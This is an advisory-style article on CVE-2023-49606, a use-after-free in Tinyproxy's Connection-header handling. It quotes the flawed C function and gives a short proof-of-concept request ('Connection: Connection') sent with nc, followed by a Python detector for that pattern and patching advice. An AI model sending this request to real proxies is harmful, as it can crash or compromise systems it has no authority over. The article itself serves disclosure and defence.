A security flaw has been identified in Tinyproxy, a lightweight HTTP/HTTPS proxy daemon widely used in small network environments.
The vulnerability, cataloged under CVE-2023-49606, allows remote attackers to execute arbitrary code on the host machine.
This flaw poses a critical risk as it could enable attackers to gain unauthorized access to network resources, potentially leading to further exploitation of internal systems.
Tinyproxy is designed to be a minimalistic proxy solution, which makes it popular in environments where system resources are limited and a full-featured proxy would be impractical.
Despite its benefits, this vulnerability highlights the risk of deploying it, especially in security-sensitive environments.
The vulnerability stems from improper memory handling within Tinyproxy’s HTTP request parsing mechanism.
Attackers can exploit this flaw by sending specially crafted HTTP requests to the affected server.
This triggers a buffer overflow or a use-after-free error, leading to arbitrary code execution under the privileges of the Tinyproxy process.
Tinyproxy removes the hop-by-hop headers named in a Connection header in the remove_connection_headers() function:
static int remove_connection_headers (orderedmap hashofheaders)
{
    static const char *headers[] = {
        "connection",
        "proxy-connection"
    };
    char *data;
    char *ptr;
    ssize_t len;
    int i;

    for (i = 0; i != (sizeof (headers) / sizeof (char *)); ++i) {
        /* Look for the connection header. If it's not found, return. */
        data = orderedmap_find (hashofheaders, headers[i]);    /* (1) */
        if (!data)
            return 0;                                          /* (2) */

        ...

        /* Walk the tokens in the header value and remove each header they name. */
        ptr = data;
        while (ptr < data + len) {
            orderedmap_remove (hashofheaders, ptr);            /* (3) */
            ...
        }

        /* Now remove the connection header itself. */
        orderedmap_remove (hashofheaders, headers[i]);         /* (4) */
    }

    return 0;
}
Exploit Proof of Concept
The PoC for the vulnerability is a very simple HTTP request. One variation is:
GET / HTTP/1.1
Connection: Connection
Host: 192.168.86.166:8000
Assuming there is an actual host at 192.168.86.166:8000, one can do:
cat heap-uaf.poc | nc 127.0.0.1 8888
With the relevant tinyproxy.config being:
Port 8888
Listen 127.0.0.1
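A request-level check for the pattern in the PoC above, added here as an example (it is neither Tinyproxy code nor part of the Talos report): it tokenizes Connection and Proxy-Connection values and flags tokens that name a connection-control header, since a legitimate client never lists Connection inside Connection. The separator set is taken from the Tinyproxy source (the line the excerpt above elides), and header-name matching is treated as case-insensitive.

```python
from dataclasses import dataclass

# Separator characters Tinyproxy's remove_connection_headers() turns into NULs
# when it splits a Connection header value into tokens (from the Tinyproxy
# source, not shown in the excerpt above).
TOKEN_SEPARATORS = '()<>@,;:\\"/[]?={} \t'

# The two headers whose values the function walks, freeing each named header.
CONNECTION_HEADERS = ("connection", "proxy-connection")


@dataclass(frozen=True)
class Finding:
    header: str   # header whose value carried the token, lower-cased
    token: str    # offending token exactly as sent
    reason: str


def split_tokens(value: str) -> list[str]:
    """Split a header value the way the C code does: every separator ends a
    token, and runs of separators produce no empty tokens."""
    tokens, cur = [], []
    for ch in value:
        if ch in TOKEN_SEPARATORS:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_headers(raw_request: str) -> list[tuple[str, str]]:
    """Return (name, value) pairs from a raw HTTP/1.x request head; the
    request line is skipped and any body after the blank line is ignored."""
    head = raw_request.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    pairs = []
    for line in head.split("\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def inspect_request(raw_request: str) -> list[Finding]:
    """Flag Connection/Proxy-Connection values naming a connection-control
    header. A token naming the header it sits in is the CVE-2023-49606 PoC
    pattern: removing it frees the buffer the loop is still walking."""
    findings = []
    for name, value in parse_headers(raw_request):
        lname = name.lower()
        if lname not in CONNECTION_HEADERS:
            continue
        for tok in split_tokens(value):
            if tok.lower() == lname:
                findings.append(Finding(lname, tok, "self-referential token (PoC pattern)"))
            elif tok.lower() in CONNECTION_HEADERS:
                findings.append(Finding(lname, tok, "names another connection-control header"))
    return findings
```

Feed it the reassembled request head from a proxy access capture; a non-empty result on a request to a Tinyproxy listener is worth an alert regardless of whether the proxy has already been patched.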
The issue was first reported by the Cisco Talos Intelligence Group, which regularly scans popular open-source software for security vulnerabilities.
Following the discovery, patches and updates were swiftly released to mitigate the risk.
Users of Tinyproxy are urged to update to the latest version to protect against potential exploits.
For network administrators and users of Tinyproxy, it is crucial to apply the security patches provided by the developers immediately.
Additionally, monitoring network activity for any unusual behavior that might indicate an attempt to exploit this vulnerability is recommended.
Organizations should also consider implementing additional security measures such as intrusion detection systems (IDS) and regular security audits to protect their networks further.
Given the nature of this vulnerability, it is also advisable to restrict the network access to Tinyproxy servers, ensuring that only trusted devices can communicate with the proxy.
While Tinyproxy offers significant advantages for small networks, this incident reminds us of the importance of maintaining up-to-date security practices, even in less resource-intensive applications.